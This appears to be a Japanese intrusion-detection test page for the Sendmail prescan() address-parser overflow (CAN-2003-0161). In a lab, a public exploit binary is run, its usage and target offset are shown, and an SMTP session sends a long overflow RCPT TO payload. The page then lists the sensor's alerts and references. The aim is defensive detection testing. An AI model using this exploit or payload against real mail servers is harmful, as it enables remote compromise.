【CAN-2003-0161】SMTP_ParseAddr_Overflow

テーマ:

項目

攻撃

リモート

攻撃ポート

25

対象OS

Unix

CVE

CAN-2003-0161

MS

攻撃の概要


ISS X-Force

Sendmail address parser buffer overflow

http://www.iss.net/security_center/static/11653.php


検証環境

優先度

OS

IP

Intruder:

Windows2000

192.168.221.110

Victim:

Windows2000

192.168.221.180

センサー

ProvenitaM10

XPU1.66


実証コード

[root@linux Email]# ./SMTP_ParseAddr_Overflow_bysin2

./SMTP_ParseAddr_Overflow_bysin2 <target ip> <target number>

Sendmail 8.12.8 prescan() exploit by bysin


Target Addr OS

-------------------------------------------

* 0 0xbfbfdad1 FreeBSD 4.7-RELEASE


[root@linux Email]# ./SMTP_ParseAddr_Overflow_bysin2 192.168.221.180 0

Sendmail 8.12.8 prescan() exploit by bysin


Resolving address... Address found

Connecting... Connected

Sending exploit...

220 TEST-LR0IS30UAX Microsoft ESMTP MAIL Service, Version: 5.0.2195.6713 ready at Sun, 29 Jan 2006 12:53:35 +0900


HELO yahoo.com


250 TEST-LR0IS30UAX Hello [192.168.221.110]


MAIL FROM: <a@yahoo.com>


250 2.1.0 a@yahoo.com....Sender OK


RCPT TO: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAムレソソAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;\\\\\\\\\\\\\\\\\\\\\\\\\\\\


500 5.3.3 Unrecognized command


トレース

イベント一覧

優先度

シグネチャ名

検知件数

High

SMTP_ParseAddr_Overflow

2

Low

Email_From

2

Low

Email_To

2


イベント詳細

SMTP_ParseAddr_Overflow.jpg

参照事項

CERT Vulnerability Note VU#897604

Sendmail address parsing buffer overflow

http://www.kb.cert.org/vuls/id/897604


CERT Advisory CA-2003-12

Buffer Overflow in Sendmail

http://www.cert.org/advisories/CA-2003-12.html


CVE
CAN-2003-0161
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0161




















AD